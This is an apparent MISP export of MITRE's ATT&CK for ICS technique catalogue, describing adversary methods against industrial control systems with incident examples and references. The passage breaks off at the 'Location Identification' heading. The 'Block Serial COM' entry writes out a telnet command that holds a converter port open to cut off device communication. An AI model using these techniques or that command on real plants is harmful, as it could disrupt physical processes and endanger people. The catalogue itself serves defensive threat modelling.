https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html

Techniques

A list of Techniques in ATT&CK for ICS..

Techniques is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MITRE

Activate Firmware Update Mode

Adversaries may activate firmware update mode on devices to prevent expected response functions from engaging in reaction to an emergency or process malfunction. For example, devices such as protection relays may have an operation mode designed for firmware installation. This mode may halt process monitoring and related functions to allow new firmware to be loaded. A device left in update mode may be placed in an inactive holding state if no firmware is provided to it. By entering and leaving a device in this mode, the adversary may deny its usual functionalities.

The tag is: misp-galaxy:mitre-ics-techniques="Activate Firmware Update Mode"

Table 6922. Table References

Links

https://dragos.com/wp-content/uploads/CRASHOVERRIDE.pdf

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

Alarm Suppression

Adversaries may target protection function alarms to prevent them from notifying operators of critical conditions. Alarm messages may be a part of an overall reporting system and of particular interest for adversaries. Disruption of the alarm system does not imply the disruption of the reporting system as a whole. In the Maroochy Attack, the adversary suppressed alarm reporting to the central computer. A Secura presentation on targeting OT notes a dual fold goal for adversaries attempting alarm suppression: prevent outgoing alarms from being raised and prevent incoming alarms from being responded to. The method of suppression may greatly depend on the type of alarm in question: An alarm raised by a protocol message. An alarm signaled with I/O. An alarm bit set in a flag and read In ICS environments, the adversary may have to suppress or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring.2 Methods of suppression may involve tampering or altering device displays and logs, modifying in memory code to fixed values, or even tampering with assembly level instruction code.

The tag is: misp-galaxy:mitre-ics-techniques="Alarm Suppression"

Table 6923. Table References

Links

https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

https://troopers.de/downloads/troopers19/TROOPERS19_NGI_IoT_diet_poisoned_fruit.pdf

Automated Collection

Adversaries may automate collection of industrial environment information using tools or scripts. This automated collection may leverage native control protocols and tools available in the control systems environment. For example, the OPC protocol may be used to enumerate and gather information. Access to a system or interface with these native protocols may allow collection and enumeration of other attached, communicating servers and devices.

The tag is: misp-galaxy:mitre-ics-techniques="Automated Collection"

Table 6924. Table References

Links

https://www.f-secure.com/weblog/archives/00002718.html

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

Block Command Message

Adversaries may block a command message from reaching its intended target to prevent command execution. In OT networks, command messages are sent to provide instructions to control system devices. A blocked command message can inhibit response functions from correcting a disruption or unsafe condition. In the 2015 attack on the Ukranian power grid, malicious firmware was used to render communication devices inoperable and effectively prevent them from receiving remote command messages.

The tag is: misp-galaxy:mitre-ics-techniques="Block Command Message"

Table 6925. Table References

Links

http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258

https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Block Reporting Message

Adversaries may block or prevent a reporting message from reaching its intended target. Reporting messages relay the status of control system devices, which can include event log data and I/O values of the associated device. By blocking these reporting messages, an adversary can potentially hide their actions from an operator. Blocking reporting messages in control systems that manage physical processes may contribute to system impact, causing inhibition of a response function. A control system may not be able to respond in a proper or timely manner to an event, such as a dangerous fault, if its corresponding reporting message is blocked. In the 2015 attack on the Ukranian power grid, malicious firmware was used to render communication devices inoperable and effectively block messages from being reported.

The tag is: misp-galaxy:mitre-ics-techniques="Block Reporting Message"

Table 6926. Table References

Links

http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258

https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Block Serial COM

Adversaries may block access to serial COM to prevent instructions or configurations from reaching target devices. Serial Communication ports (COM) allow communication with control system devices. Devices can receive command and configuration messages over such serial COM. Devices also use serial COM to send command and reporting messages. Blocking device serial COM may also block command messages and block reporting messages. A serial to Ethernet converter is often connected to a serial COM to facilitate communication between serial and Ethernet devices. One approach to blocking a serial COM would be to create and hold open a TCP session with the Ethernet side of the converter. A serial to Ethernet converter may have a few ports open to facilitate multiple communications. For example, if there are three serial COM available — 1, 2 and 3 --, the converter might be listening on the corresponding ports 20001, 20002, and 20003. If a TCP/IP connection is opened with one of these ports and held open, then the port will be unavailable for use by another party. One way the adversary could achieve this would be to initiate a TCP session with the serial to Ethernet converter at 10.0.0.1 via Telnet on serial port 1 with the following command: telnet 10.0.0.1 20001.

The tag is: misp-galaxy:mitre-ics-techniques="Block Serial COM"

Table 6927. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Brute Force I/O

Adversaries may brute force I/O addresses on a device and attempt to exhaustively perform an action. By enumerating the full range of I/O addresses, an adversary may manipulate a process function without having to target specific I/O interfaces. More than one process function manipulation and enumeration pass may occur on the targeted I/O range in a brute force attempt.

The tag is: misp-galaxy:mitre-ics-techniques="Brute Force I/O"

Table 6928. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

Change Program State

Adversaries may attempt to change the state of the current program on a control device. Program state changes may be used to allow for another program to take over control or be loaded onto the device.

The tag is: misp-galaxy:mitre-ics-techniques="Change Program State"

Table 6929. Table References

Links

https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://github.com/MDudek-ICS/TRISIS-TRITON-HATMAN/tree/master/decompiled_code/library

Command-Line Interface

Adversaries may utilize command-line interfaces (CLIs) to interact with systems and execute commands. CLIs provide a means of interacting with computer systems and are a common feature across many types of platforms and devices within control systems environments. Adversaries may also use CLIs to install and run new software, including malicious tools that may be installed over the course of an operation. CLIs are typically accessed locally, but can also be exposed via services, such as SSH, Telnet, and RDP. Commands that are executed in the CLI execute with the current permissions level of the process running the terminal emulator, unless the command specifies a change in permissions context. Many controllers have CLI interfaces for management purposes.

The tag is: misp-galaxy:mitre-ics-techniques="Command-Line Interface"

Table 6930. Table References

Links

https://attack.mitre.org/wiki/Technique/T1059

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Commonly Used Port

Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend in with normal network activity, to avoid more detailed inspection. They may use the protocol associated with the port, or a completely different protocol. They may use commonly open ports, such as the examples as follows TCP:80 (HTTP), TCP:443 (HTTPS), TCP/UDP:53 (DNS), TCP:1024-4999 (OPC on XP/Win2k3), TCP:49152-65535 (OPC on Vista and later), TCP:23 (TELNET), UDP:161 (SNMP), TCP:502 (MODBUS), TCP:102 (S7comm/ISO-TSAP), TCP:20000 (DNP3), TCP:44818 (Ethernet/IP)

The tag is: misp-galaxy:mitre-ics-techniques="Commonly Used Port"

Table 6931. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA17-293A

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Connection Proxy

Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications. The definition of a proxy can also be expanded to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other. The network may be within a single organization or across multiple organizations with trust relationships. Adversaries could use these types of relationships to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion.

The tag is: misp-galaxy:mitre-ics-techniques="Connection Proxy"

Table 6932. Table References

Links

https://attack.mitre.org/wiki/Technique/T1090

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

https://www.cpni.gov.uk/Documents/Publications/2014/2014-04-23-c2-report-birmingham.pdf

Damage to Property

Adversaries may cause damage and destruction of property to infrastructure, equipment, and the surrounding environment when attacking control systems. This technique may result in device and operational equipment breakdown, or represent tangential damage from other techniques used in an attack. Depending on the severity of physical damage and disruption caused to control processes and systems, this technique may result in Loss of Safety. Operations that result in Loss of Control may also cause damage to property, which may be directly or indirectly motivated by an adversary seeking to cause impact in the form of Loss of Productivity and Revenue. The German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill under an incidents affecting business section of its 2014 IT Security Report. These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. As a result of these breakdowns, massive impact and damage resulted from the uncontrolled shutdown of a blast furnace. In the Maroochy Attack, Vitek Boden gained remote computer access to the control system and altered data so that whatever function should have occurred at affected pumping stations did not occur or occurred in a different way. This ultimately led to 800,000 liters of raw sewage being spilled out into the community. The raw sewage affected local parks, rivers, and even a local hotel. This resulted in harm to marine life and produced a sickening stench from the community’s now blackened rivers. A Polish student used a remote controller device to interface with the Lodz city tram system in Poland.345 Using this remote, the student was able to capture and replay legitimate tram signals. This resulted in damage to impacted trams, people, and the surrounding property. Reportedly, four trams were derailed and were forced to make emergency stops.4 Commands issued by the student may have also resulted in tram collisions, causing harm to those on board and the environment outside.

The tag is: misp-galaxy:mitre-ics-techniques="Damage to Property"

Table 6933. Table References

Links

https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2014.pdf?blob=publicationFile&v=3

https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

https://www.londonreconnections.com/2017/hacked-cyber-security-railways/

https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/

https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html

https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf

Data Destruction

Adversaries may perform data destruction over the course of an operation. The adversary may drop or create malware, tools, or other non-native files on a target system to accomplish this, potentially leaving behind traces of malicious activities. Such non-native files and other data may be removed over the course of an intrusion to maintain a small footprint or as a standard part of the post-intrusion cleanup process. Data destruction may also be used to render operator interfaces unable to respond and to disrupt response functions from occurring as expected. An adversary may also destroy data backups that are vital to recovery after an incident. Standard file deletion commands are available on most operating system and device interfaces to perform cleanup, but adversaries may use other tools as well. Two examples are Windows Sysinternals SDelete and Active@ Killdisk.

The tag is: misp-galaxy:mitre-ics-techniques="Data Destruction"

Table 6934. Table References

Links

https://attack.mitre.org/wiki/Technique/T1107

https://dragos.com/blog/crashoverride/CrashOverride-01.pdf

https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

https://technet.microsoft.com/en-us/library/ee791851.aspx

Data Historian Compromise

Adversaries may compromise and gain control of a data historian to gain a foothold into the control system environment. Access to a data historian may be used to learn stored database archival and analysis information on the control system. A dual-homed data historian may provide adversaries an interface from the IT environment to the OT environment. Dragos has released an updated analysis on CrashOverride that outlines the attack from the ICS network breach to payload delivery and execution.1 The report summarized that CrashOverride represents a new application of malware, but relied on standard intrusion techniques. In particular, new artifacts include refs to a Microsoft Windows Server 2003 host, with a SQL Server. Within the ICS environment, such a database server can act as a data historian. Dragos noted a device with this role should be expected to have extensive connections within the ICS environment. Adversary activity leveraged database capabilities to perform reconnaissance, including directory queries and network connectivity checks.

The tag is: misp-galaxy:mitre-ics-techniques="Data Historian Compromise"

Table 6935. Table References

Links

https://dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf

Data from Information Repositories

Adversaries may target and collect data from information repositories. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes. Examples of target information repositories include reference databases and local machines on the process environment.

The tag is: misp-galaxy:mitre-ics-techniques="Data from Information Repositories"

Table 6936. Table References

Links

https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf

https://www.symantec.com/security-center/writeup/2012-052811-0308-99

Default Credentials

Adversaries may leverage manufacturer or supplier set default credentials on control system devices. These default credentials may have administrative permissions and may be necessary for initial configuration of the device. It is general best practice to change the passwords for these accounts as soon as possible, but some manufacturers may have devices that have passwords or usernames that cannot be changed. Default credentials are normally documented in an instruction manual that is either packaged with the device, published online through official means, or published online through unofficial means. Adversaries may leverage default credentials that have not been properly modified or disabled.

The tag is: misp-galaxy:mitre-ics-techniques="Default Credentials"

Table 6937. Table References

Links

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Denial of Control

Adversaries may cause a denial of control to temporarily prevent operators and engineers from interacting with process controls. An adversary may attempt to deny process control access to cause a temporary loss of communication with the control device or to prevent operator adjustment of process controls. An affected process may still be operating during the period of control loss, but not necessarily in a desired state. In the Maroochy attack, the adversary was able to temporarily shut an investigator out of the network preventing them from issuing any controls.

The tag is: misp-galaxy:mitre-ics-techniques="Denial of Control"

Table 6938. Table References

Links

https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf

https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297

https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

Denial of Service

Adversaries may perform Denial-of-Service (DoS) attacks to disrupt expected device functionality. Examples of DoS attacks include overwhelming the target device with a high volume of requests in a short time period and sending the target device a request it does not know how to handle. Disrupting device state may temporarily render it unresponsive, possibly lasting until a reboot can occur. When placed in this state, devices may be unable to send and receive requests, and may not perform expected response functions in reaction to other events in the environment. Some ICS devices are particularly sensitive to DoS events, and may become unresponsive in reaction to even a simple ping sweep. Adversaries may also attempt to execute a Permanent Denial-of-Service (PDoS) against certain devices, such as in the case of the BrickerBot malware. Adversaries may exploit a software vulnerability to cause a denial of service by taking advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in software that can be used to cause a or denial of service condition. Adversaries may have prior knowledge about industrial protocols or control devices used in the environment through Control Device Identification. There are examples of adversaries remotely causing a Device Restart/Shutdown by exploiting a vulnerability that induces uncontrolled resource consumption. In the Maroochy attack, the adversary was able to shut an investigator out of the network.

The tag is: misp-galaxy:mitre-ics-techniques="Denial of Service"

Table 6939. Table References

Links

https://www.us-cert.gov/ics/alerts/ICS-ALERT-17-102-01A

https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01

http://cwe.mitre.org/data/definitions/400.html

https://nvd.nist.gov/vuln/detail/CVE-2015-5374

https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

https://ics-cert.us-cert.gov/advisories/ICSA-14-178-01

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf

Denial of View

Adversaries may cause a denial of view in attempt to disrupt and prevent operator oversight on the status of an ICS environment. This may manifest itself as a temporary communication failure between a device and its control source, where the interface recovers and becomes available once the interference ceases. An adversary may attempt to deny operator visibility by preventing them from receiving status and reporting messages. Denying this view may temporarily block and prevent operators from noticing a change in state or anomalous behavior. The environment’s data and processes may still be operational, but functioning in an unintended or adversarial manner. In the Maroochy attack, the adversary was able to temporarily shut an investigator out of the network, preventing them from viewing the state of the system.

The tag is: misp-galaxy:mitre-ics-techniques="Denial of View"

Table 6940. Table References

Links

https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf

https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297

https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false

Detect Operating Mode

Adversaries may gather information about the current operating state of a PLC. CPU operating modes are often controlled by a key switch on the PLC. Example states may be run, prog, stop, remote, and invalid. Knowledge of these states may be valuable to an adversary to determine if they are able to reprogram the PLC.

The tag is: misp-galaxy:mitre-ics-techniques="Detect Operating Mode"

Table 6941. Table References

Links

Triton contains a file named TS_cnames.py which contains default definitions for key state (TS_keystate). Key state is referenced in TsHi.py.[Triton contains a file named TS_cnames.py which contains default definitions for key state (TS_keystate). Key state is referenced in TsHi.py.]

Detect Program State

Adversaries may seek to gather information about the current state of a program on a PLC. State information reveals information about the program, including whether it’s running, halted, stopped, or has generated an exception. This information may be leveraged as a verification of malicious program execution or to determine if a PLC is ready to download a new program.

The tag is: misp-galaxy:mitre-ics-techniques="Detect Program State"

Table 6942. Table References

Links

https://github.com/MDudek-ICS/TRISIS-TRITON-HATMAN/tree/master/decompiled_code/library

Device Restart/Shutdown

Adversaries may forcibly restart or shutdown a device in the ICS environment to disrupt and potentially cause adverse effects on the physical processes it helps to control. Methods of device restart and shutdown exist as built-in, standard functionalities. This can include interactive device web interfaces, CLIs, and network protocol commands, among others. Device restart or shutdown may also occur as a consequence of changing a device into an alternative mode of operation for testing or firmware loading. Unexpected restart or shutdown of control system devices may contribute to impact, by preventing expected response functions from activating and being received in critical states. This can also be a sign of malicious device modification, as many updates require a shutdown in order to take affect. For example, DNP3’s function code 0x0D can reset and reconfigure DNP3 outstations by forcing them to perform a complete power cycle. In the 2015 attack on the Ukranian power grid, the adversaries gained access to the control networks of three different energy companies. The adversaries scheduled disconnects for the uniterruptable power supply (UPS) systems so that when power was disconnected from the substations, the devices would shut down and service could not be recovered.

The tag is: misp-galaxy:mitre-ics-techniques="Device Restart/Shutdown"

Table 6943. Table References

Links

http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258

https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Drive-by Compromise

Adversaries may gain access to a system during a drive-by compromise, when a user visits a website as part of a regular browsing session.With this technique, the user’s web browser is targeted and exploited simply by visiting the compromised website. The adversary may target a specific community, such as trusted third party suppliers or other industry specific groups, which often visit the target website. This kind of targeted attack relies on a common interest, and is known as a strategic web compromise or watering hole attack. The National Cyber Awareness System (NCAS) has issued a Technical Alert (TA) regarding Russian government cyber activity targeting critical infrastructure sectors. Analysis by DHS and FBI has noted two distinct categories of victims in the Dragonfly campaign on the Western energy sector: staging and intended targets. The adversary targeted the less secure networks of staging targets, including trusted third-party suppliers and related peripheral organizations. Initial access to the intended targets used watering hole attacks to target process control, ICS, and critical infrastructure related trade publications and informational websites.

The tag is: misp-galaxy:mitre-ics-techniques="Drive-by Compromise"

Table 6944. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA18-074A

https://www.securityweek.com/allanite-group-targets-ics-networks-electric-utilities-us-uk

https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group

https://www.us-cert.gov/ncas/alerts/TA17-293A

https://www.cyberviser.com/2018/05/group-linked-to-shamoon-attacks-targeting-ics-networks-in-middle-east-and-uk/

https://www.cyberscoop.com/xenotime-ics-cyber-attacks-trisis-dragos/

https://securelist.com/bad-rabbit-ransomware/82851/

Engineering Workstation Compromise

Adversaries may compromise and gain control of an engineering workstation as an Initial Access technique into the control system environment. Access to an engineering workstation may occur as a result of remote access or by physical means, such as a person with privileged access or infection by removable media. A dual-homed engineering workstation may allow the adversary access into multiple networks. For example, unsegregated process control, safety system, or information system networks. An Engineering Workstation is designed as a reliable computing platform that configures, maintains, and diagnoses control system equipment and applications. Compromise of an engineering workstation may provide access to and control of other control system applications and equipment. In the Maroochy attack, the adversary utilized a computer, possibly stolen, with proprietary engineering software to communicate with a wastewater system.

The tag is: misp-galaxy:mitre-ics-techniques="Engineering Workstation Compromise"

Table 6945. Table References

Links

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html

Execution through API

Adversaries may attempt to leverage Application Program Interfaces (APIs) used for communication between control software and the hardware. Specific functionality is often coded into APIs which can be called by software to engage specific functions on a device or other software, such as Change Program State of a program on a PLC.

The tag is: misp-galaxy:mitre-ics-techniques="Execution through API"

Table 6946. Table References

Links

https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware

Exploit Public-Facing Application

Adversaries may attempt to exploit public-facing applications to leverage weaknesses on Internet-facing computer systems, programs, or assets in order to cause unintended or unexpected behavior. These public-facing applications may include user interfaces, software, data, or commands. In particular, a public-facing application in the IT environment may provide adversaries an interface into the OT environment. ICS-CERT analysis has identified the probable initial infection vector for systems running GE’s Cimplicity HMI with a direct connection to the Internet.

The tag is: misp-galaxy:mitre-ics-techniques="Exploit Public-Facing Application"

Table 6947. Table References

Links

https://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B

Exploitation for Evasion

Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to evade detection. Vulnerabilities may exist in software that can be used to disable or circumvent security features. Adversaries may have prior knowledge through Control Device Identification about security features implemented on control devices. These device security features will likely be targeted directly for exploitation. There are examples of firmware RAM/ROM consistency checks on control devices being targeted by adversaries to enable the installation of malicious System Firmware.

The tag is: misp-galaxy:mitre-ics-techniques="Exploitation for Evasion"

Table 6948. Table References

Links

https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf

https://ics-cert.us-cert.gov/advisories/ICSA-18-107-02

https://www.youtube.com/watch?v=f09E75bWvkk&index=3&list=PL8OWO1qWXF4qYG19p7An4Vw3N2YZ86aRS&t=0s

https://nvd.nist.gov/vuln/detail/CVE-2018-8872

https://cwe.mitre.org/data/definitions/119.html

https://www.nrc.gov/docs/ML1209/ML120900890.pdf

Exploitation of Remote Services

Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to enable remote service abuse. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system. ICS asset owners and operators have been affected by ransomware (or disruptive malware masquerading as ransomware) migrating from enterprise IT to ICS environments: WannaCry, NotPetya, and BadRabbit. In each of these cases, self-propagating (“wormable”) malware initially infected IT networks, but through exploit (particularly the SMBv1-targeting MS17-010 vulnerability) spread to industrial networks, producing significant impacts.

The tag is: misp-galaxy:mitre-ics-techniques="Exploitation of Remote Services"

Table 6949. Table References

Links

https://attack.mitre.org/techniques/T1210/

https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/

External Remote Services

Adversaries may leverage external remote services as a point of initial access into your network. These services allow users to connect to internal network resources from external locations. Examples are VPNs, Citrix, and other access mechanisms. Remote service gateways often manage connections and credential authentication for these services. External remote services allow administration of a control system from outside the system. Often, vendors and internal engineering groups have access to external remote services to control system networks via the corporate network. In some cases, this access is enabled directly from the internet. While remote access enables ease of maintenance when a control system is in a remote area, compromise of remote access solutions is a liability. The adversary may use these services to gain access to and execute attacks against a control system network. Access to valid accounts is often a requirement. As they look for an entry point into the control system network, adversaries may begin searching for existing point?to?point VPN implementations at trusted third party networks or through remote support employee connections where split tunneling is enabled. In the Maroochy Attack, the adversary was able to gain remote computer access to the system over radio. The 2015 attack on the Ukranian power grid showed the use of existing remote access tools within the environment to access the control system network. The adversary harvested worker credentials, some of them for VPNs the grid workers used to remotely log into the control system networks.3245 The VPNs into these networks appear to have lacked two?factor authentication.

The tag is: misp-galaxy:mitre-ics-techniques="External Remote Services"

Table 6950. Table References

Links

https://attack.mitre.org/wiki/Technique/T1133

https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf

https://www.wired.com/2016/03/inside-cunning-unprecedented-hack-ukraines-power-grid/

https://ics-cert.us-cert.gov/alerts/IR-ALERT-H-16-056-01

https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html

https://dragos.com/blog/trisis/TRISIS-01.pdf

https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Graphical User Interface

Adversaries may attempt to gain access to a machine via a Graphical User Interface (GUI) to enhance execution capabilities. Access to a GUI allows a user to interact with a computer in a more visual manner than a CLI. A GUI allows users to move a cursor and click on interface objects, with a mouse and keyboard as the main input devices, as opposed to just using the keyboard. If physical access is not an option, then access might be possible via protocols such as VNC on Linux-based and Unix-based operating systems, and RDP on Windows operating systems. An adversary can use this access to execute programs and applications on the target machine. In the 2015 attack on the Ukrainian power grid, the adversary utilized the GUI of HMIs in the SCADA environment to open breakers.

The tag is: misp-galaxy:mitre-ics-techniques="Graphical User Interface"

Table 6951. Table References

Links

https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

https://technet.microsoft.com/en-us/library/ee791851.aspx

Hooking

Adversaries may hook into application programming interface (API) functions used by processes to redirect calls for persistent means. Windows processes often leverage these API functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. One type of hooking seen in ICS involves redirecting calls to these functions via import address table (IAT) hooking. IAT hooking uses modifications to a process’s IAT, where pointers to imported API functions are stored.

The tag is: misp-galaxy:mitre-ics-techniques="Hooking"

Table 6952. Table References

Links

https://attack.mitre.org/techniques/T1179/

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

I/O Image

Adversaries may seek to capture process image values related to the inputs and outputs of a PLC. Within a PLC all input and output states are stored into an I/O image. This image is used by the user program instead of directly interacting with physical I/O.

The tag is: misp-galaxy:mitre-ics-techniques="I/O Image"

Table 6953. Table References

Links

https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC.pdf

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

I/O Module Discovery

Adversaries may use input/output (I/O) module discovery to gather key information about a control system device. An I/O module is a device that allows the control system device to either receive or send signals to other devices. These signals can be analog or digital, and may support a number of different protocols. Devices are often able to use attachable I/O modules to increase the number of inputs and outputs that it can utilize. An adversary with access to a device can use native device functions to enumerate I/O modules that are connected to the device. Information regarding the I/O modules can aid the adversary in understanding related control processes.

The tag is: misp-galaxy:mitre-ics-techniques="I/O Module Discovery"

Table 6954. Table References

Links

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Indicator Removal on Host

Adversaries may attempt to remove indicators of their presence on a system in an effort to cover their tracks. In cases where an adversary may feel detection is imminent, they may try to overwrite, delete, or cover up changes they have made to the device.

The tag is: misp-galaxy:mitre-ics-techniques="Indicator Removal on Host"

Table 6955. Table References

Links

https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/

https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware

Internet Accessible Device

Adversaries may gain access into industrial environments directly through systems exposed to the internet for remote access rather than through External Remote Services. Minimal protections provided by these devices such as password authentication may be targeted and compromised. In the case of the Bowman dam incident, adversaries leveraged access to the dam control network through a cellular modem. Access to the device was protected by password authentication, although the application was vulnerable to brute forcing.

The tag is: misp-galaxy:mitre-ics-techniques="Internet Accessible Device"

Table 6956. Table References

Links

https://www.us-cert.gov/sites/default/files/Monitors/ICS-CERT_Monitor_Jan-April2014.pdf

https://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559

https://time.com/4270728/iran-cyber-attack-dam-fbi/

https://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B

https://www.us-cert.gov/ics/advisories/ICSA-11-094-02B

Location Identification

